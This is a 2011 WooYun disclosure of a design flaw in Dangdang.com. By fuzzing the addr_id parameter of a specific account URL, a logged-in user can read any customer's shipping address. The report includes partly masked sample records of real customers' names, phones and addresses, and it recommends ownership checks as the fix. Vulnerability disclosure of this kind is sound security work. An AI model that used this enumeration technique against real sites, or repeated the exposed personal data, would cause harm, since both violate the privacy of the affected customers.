漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2011-03271
漏洞标题:当当网设计缺陷导致用户资料泄露
相关厂商:当当网
漏洞作者: 北京基友团
提交时间:2011-11-10 02:23
修复时间:2011-11-10 11:22
公开时间:2011-11-10 11:22
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2011-11-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-11-10: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
某处设计不当,不能过于详细,太容易发现了,可导致所有用户的姓名,联系方式,地址等泄露
详细说明:
登陆后
http://account.dangdang.com/payhistory/myaddress.aspx?addr_id=10000&cid=1&op=bindselected
通过fuzz上面URL中得 addr_id= 可以得到全部的收件地址
漏洞证明:
敏感信息用*代替了
{'addr_detail':'(家庭地址)先烈东横**************房','city_id':'5','country_id':'9000','cust_address_id':'10000','cust_id':'2645241','errorCode':0,'province_id':'144','ship_man':'谢楚*','ship_mb':'13580*******','ship_tel':'020-37245661','ship_zip':'510075','status':'-1','statusCode':0,'town_id':''}
{'addr_detail':'(家庭地址)回龙观***************室','city_id':'1','country_id':'9000','cust_address_id':'10001','cust_id':'3088863','errorCode':0,'province_id':'111','ship_man':'应*','ship_mb':'','ship_tel':'010-817*******','ship_zip':'102208','status':'2','statusCode':0,'town_id':''}
修复方案:
1对请求的用户判断该addr_id是否当前用户所有
2审计SQL语句,避免造成横向越权
版权声明:转载请注明来源 北京基友团@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)